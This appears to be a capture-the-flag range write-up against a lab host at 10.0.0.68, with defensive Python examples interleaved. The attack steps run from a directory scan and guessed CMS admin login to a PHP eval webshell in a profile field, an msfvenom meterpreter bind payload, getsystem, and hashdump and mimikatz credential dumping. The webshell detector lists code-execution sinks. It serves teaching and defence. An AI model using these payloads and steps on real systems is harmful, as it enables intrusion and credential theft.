PT-1 Target Machine
Kali range notes. Start the target machine, download the OpenVPN client file provided by the range, and connect with:
openvpn --config cyberstrikelab.com-PT-1.ovpn
Then leave it running and open a new terminal for the remaining steps.
Main page of the range:

At the very bottom of the page the site's CMS is shown.

Directory scan:
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\security\dirsearch-0.4.3\reports\http_10.0.0.68\__25-03-22_15-38-38.txt
Target: http://10.0.0.68/
[15:38:38] Starting:
[15:38:39] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[15:38:39] 403 - 211B - /%3f/
[15:38:39] 301 - 228B - /js -> http://10.0.0.68/js/
[15:38:39] 403 - 210B - /%ff
[15:38:41] 403 - 220B - /.ht_wsr.txt
[15:38:41] 403 - 223B - /.htaccess.bak1
[15:38:41] 403 - 223B - /.htaccess.orig
[15:38:41] 403 - 225B - /.htaccess.sample
[15:38:41] 403 - 223B - /.htaccess.save
[15:38:41] 403 - 223B - /.htaccess_orig
[15:38:41] 403 - 224B - /.htaccess_extra
[15:38:41] 403 - 221B - /.htaccess_sc
[15:38:41] 403 - 221B - /.htaccessBAK
[15:38:41] 403 - 221B - /.htaccessOLD
[15:38:41] 403 - 222B - /.htaccessOLD2
[15:38:41] 403 - 214B - /.html
[15:38:41] 403 - 213B - /.htm
[15:38:41] 403 - 223B - /.htpasswd_test
[15:38:41] 403 - 219B - /.htpasswds
[15:38:41] 403 - 220B - /.httr-oauth
[15:38:55] 301 - 233B - /article -> http://10.0.0.68/article/
[15:38:55] 200 - 1KB - /article/
[15:38:59] 301 - 233B - /comment -> http://10.0.0.68/comment/
[15:39:01] 301 - 230B - /data -> http://10.0.0.68/data/
[15:39:01] 200 - 1KB - /data/
[15:39:01] 200 - 3B - /data/cache/
[15:39:01] 200 - 3B - /data/sessions/
[15:39:02] 301 - 232B - /detail -> http://10.0.0.68/detail/
[15:39:04] 200 - 1KB - /err.php
[15:39:05] 200 - 17KB - /favicon.ico
[15:39:08] 200 - 1KB - /i.php
[15:39:09] 301 - 233B - /include -> http://10.0.0.68/include/
[15:39:09] 200 - 2KB - /include/
[15:39:09] 403 - 225B - /index.php::$DATA
[15:39:09] 301 - 233B - /Install -> http://10.0.0.68/Install/
[15:39:09] 301 - 233B - /INSTALL -> http://10.0.0.68/INSTALL/
[15:39:09] 301 - 233B - /install -> http://10.0.0.68/install/
[15:39:10] 200 - 782B - /install/
[15:39:10] 200 - 590B - /js/
[15:39:12] 301 - 230B - /list -> http://10.0.0.68/list/
[15:39:12] 200 - 16KB - /login.php
[15:39:14] 200 - 5KB - /member.php
[15:39:16] 301 - 230B - /news -> http://10.0.0.68/news/
[15:39:19] 301 - 236B - /phpMyAdmin -> http://10.0.0.68/phpMyAdmin/
[15:39:19] 301 - 236B - /phpmyadmin -> http://10.0.0.68/phpmyadmin/
[15:39:20] 200 - 2KB - /phpmyadmin/README
[15:39:20] 200 - 32KB - /phpmyadmin/ChangeLog
[15:39:22] 200 - 4KB - /phpMyAdmin/
[15:39:22] 200 - 4KB - /phpMyadmin/
[15:39:22] 200 - 4KB - /phpMyAdmin/index.php
[15:39:22] 200 - 4KB - /phpmyadmin/index.php
[15:39:22] 200 - 4KB - /phpmyAdmin/
[15:39:22] 200 - 4KB - /phpmyadmin/
[15:39:24] 200 - 1KB - /s.php
[15:39:25] 200 - 1KB - /search.php
[15:39:31] 301 - 234B - /templets -> http://10.0.0.68/templets/
[15:39:32] 403 - 225B - /Trace.axd::$DATA
[15:39:32] 301 - 231B - /topic -> http://10.0.0.68/topic/
[15:39:33] 200 - 406B - /uploads/
[15:39:33] 301 - 233B - /uploads -> http://10.0.0.68/uploads/
[15:39:35] 301 - 231B - /video -> http://10.0.0.68/video/
[15:39:36] 403 - 226B - /web.config::$DATA
Task Completed
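From a defender's side, the scan above is an exposure inventory: the installer, phpMyAdmin, and the listable data/ and uploads/ directories all answer 200 and should be removed or access-restricted. The following is an added example, not part of the original writeup or of the dirsearch project: it parses dirsearch-style lines and maps each directly readable sensitive path to a remediation. The sample lines are copied from the output above; the prefix-to-remediation table is an assumption made for this example.

```python
import re

# Constructed sample: lines copied in the shape of the dirsearch output above
SAMPLE_SCAN = """\
[15:38:39] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[15:38:39] 301 - 228B - /js -> http://10.0.0.68/js/
[15:39:01] 200 - 1KB - /data/
[15:39:01] 200 - 3B - /data/sessions/
[15:39:09] 403 - 225B - /index.php::$DATA
[15:39:10] 200 - 782B - /install/
[15:39:12] 200 - 16KB - /login.php
[15:39:22] 200 - 4KB - /phpMyAdmin/
[15:39:33] 200 - 406B - /uploads/
"""

# [HH:MM:SS] <status> - <size> - <path> [-> redirect]
LINE_RE = re.compile(r'^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+(\S+)\s+-\s+(\S+)')

# Hardening rules for this example (an assumption, not a dirsearch feature):
# a readable path under one of these prefixes is a finding with a remediation.
SENSITIVE_PREFIXES = {
    '/install/': 'installer still deployed: delete it after setup',
    '/phpmyadmin/': 'database admin panel reachable: restrict by source IP or remove',
    '/data/': 'runtime data directory listable: disable autoindex and deny web access',
    '/uploads/': 'upload directory listable: disable autoindex and block script execution',
}


def parse_scan(text):
    """Parse dirsearch-style lines into (status, size, path) tuples."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            results.append((int(m.group(1)), m.group(2), m.group(3)))
    return results


def exposure_report(text):
    """Map each directly readable (2xx) sensitive path to its remediation."""
    findings = {}
    for status, _size, path in parse_scan(text):
        if not 200 <= status < 300:
            continue  # 403 and 301 hits are not readable content
        lowered = path.lower()  # /phpMyAdmin/ and /phpmyadmin/ are the same finding
        for prefix, advice in SENSITIVE_PREFIXES.items():
            if lowered.startswith(prefix):
                findings[path] = advice
                break
    return findings


if __name__ == '__main__':
    for path, advice in exposure_report(SAMPLE_SCAN).items():
        print(f'{path:20} {advice}')
```

Only 2xx responses are reported: the 403 entries show the web server already denying those paths, and 301 entries are followed by their own 200 line when the target is listable.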
http://10.0.0.68/data/admin/ver.txt : the file in this directory reveals the CMS version, v12.9.
Next, look up known historical vulnerabilities for this CMS.
Open the CMS admin backend:

Guessing that both the username and the password are cslab allows login.

On the user page, in the member message notification field, insert the one-line webshell 1";@eval($_POST[cmd]);;//

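The stored value above is a PHP code-execution sink (eval) fed directly from request input, which is the classic webshell indicator a defender can look for both at write time (reject the field) and on disk (scan the CMS's writable directories for files that now carry it). The following is an added example, not part of the original writeup or of the CMS: the indicator regex and the file-type list are assumptions made for this example, and the sample directory tree is constructed in a temp directory.

```python
import os
import re
import tempfile

# Indicator used by this example (an assumption about what to flag, not a CMS feature):
# a PHP code-execution sink whose argument references request input on the same line.
SINKS = r'(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)'
REQUEST_INPUT = r'\$_(?:POST|GET|REQUEST|COOKIE)'
WEBSHELL_RE = re.compile(rf'@?\b{SINKS}\s*\(.*?{REQUEST_INPUT}', re.IGNORECASE)

INJECTED = '1";@eval($_POST[cmd]);;//'  # the stored string from the writeup above


def field_is_safe(value):
    """Input-side check: refuse to persist a profile or notification value carrying the indicator."""
    return WEBSHELL_RE.search(value) is None


def suspicious_lines(text):
    """Return (line_no, line) for each line of a file that matches the indicator."""
    return [(n, line) for n, line in enumerate(text.splitlines(), 1)
            if WEBSHELL_RE.search(line)]


def scan_tree(root, exts=('.php', '.inc', '.htm', '.html')):
    """Scan a directory tree (e.g. the CMS's writable data/ directory) for files carrying the indicator."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                hits = suspicious_lines(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree():
    """Constructed sample: one clean config file and one where the stored field was written into PHP."""
    root = tempfile.mkdtemp()
    cache = os.path.join(root, 'data', 'cache')
    os.makedirs(cache)
    with open(os.path.join(cache, 'clean.php'), 'w', encoding='utf-8') as fh:
        fh.write("<?php\n$cfg['site'] = 'demo';\necho htmlspecialchars($cfg['site']);\n")
    with open(os.path.join(cache, 'notice.php'), 'w', encoding='utf-8') as fh:
        fh.write('<?php\n$cfg[\'notice\'] = "' + INJECTED + '";\n')
    return root


if __name__ == '__main__':
    print('field accepted:', field_is_safe(INJECTED))
    for path, hits in scan_tree(build_sample_tree()).items():
        for line_no, line in hits:
            print(f'{path}:{line_no}: {line.strip()}')
```

The durable fix is on the CMS side: a user-controlled field must never be written into a PHP file unescaped. The scanner is the detection layer for installations where that has already happened; run it against the web root's writable directories and alert on any hit.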
Kali does not ship with AntSword (蚁剑), so download the Linux build of AntSword directly from GitHub.
Connect with AntSword:

flag.txt is found on the C: drive.

flag:
go-flag{a3aecfd5-17db-52a0-ac1d-3a32124b04f4}
Use msfvenom with a bind (forward-connect) payload.
Generate the payload:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe
Then, in AntSword, upload the file directly to the chosen directory.

Run the payload from the command line.

Configure msf and connect:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.0.68
set lport 4444
run
Privilege escalation:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Retrieve password hashes:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
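Read as an audit artifact, the dump above already tells a defender three things: every LM field is the empty-LM value, so LM hash storage is off; DefaultAccount and Guest carry the NT hash of the empty password, which is expected only if those accounts are disabled; and any NT hash shared between accounts means one recovered credential covers all of them. The following is an added example, not part of the original writeup or of Metasploit: it parses pwdump-format lines and reports those three conditions. The two constants are the well-known hashes of the empty password; the sample copies the four lines above and adds one constructed account (svc_backup) that reuses the Administrator hash so that reuse detection has something to report.

```python
from collections import defaultdict

# Well-known constants: hashes of the empty password (facts, not assumptions)
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'  # LM hash of ""
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'  # NT hash (MD4 of UTF-16LE "")

# Sample dump: the four lines from the hashdump above, plus one constructed
# account (svc_backup) that reuses the Administrator NT hash, to show reuse detection.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
ApacheUser:1000:aad3b435b51404eeaad3b435b51404ee:01ef84bcd8079831f0966ac49ae9c0e6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:cad8ef0c410c9709cea512052756ce5a:::
"""


def parse_pwdump(text):
    """Parse user:rid:lm:nt::: lines into dicts; malformed lines are skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(':')
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts.append({'user': parts[0], 'rid': int(parts[1]),
                         'lm': parts[2].lower(), 'nt': parts[3].lower()})
    return accounts


def audit(text):
    """Flag empty passwords, LM hashes still stored, and NT hashes shared by several accounts."""
    accounts = parse_pwdump(text)
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a['nt']].append(a['user'])
    return {
        'empty_password': [a['user'] for a in accounts if a['nt'] == EMPTY_NT],
        'lm_stored': [a['user'] for a in accounts if a['lm'] != EMPTY_LM],
        'reused_nt': {nt: users for nt, users in by_nt.items()
                      if nt != EMPTY_NT and len(users) > 1},
    }


if __name__ == '__main__':
    for key, value in audit(SAMPLE_DUMP).items():
        print(f'{key}: {value}')
```

For the empty-password list, confirm the accounts are disabled; for the reuse map, the remediation is a distinct credential per account, and for any account whose hash was exposed, a password change, since the NT hash itself is sufficient for authentication.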
Load mimikatz with the load kiwi command, then run creds_all to retrieve all credentials:
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator WIN-S4KAS0ERCGQ cad8ef0c410c9709cea512052756ce5a 947e1029f3fc1ce2f1f6592a1e55844dd3152ea2
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
WIN-S4KAS0ERCGQ$ WORKGROUP (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN-S4KAS0ERCGQ (null)
win-s4kas0ercgq$ WORKGROUP (null)
flag2: the challenge asks for the NTLM hash value:
cad8ef0c410c9709cea512052756ce5a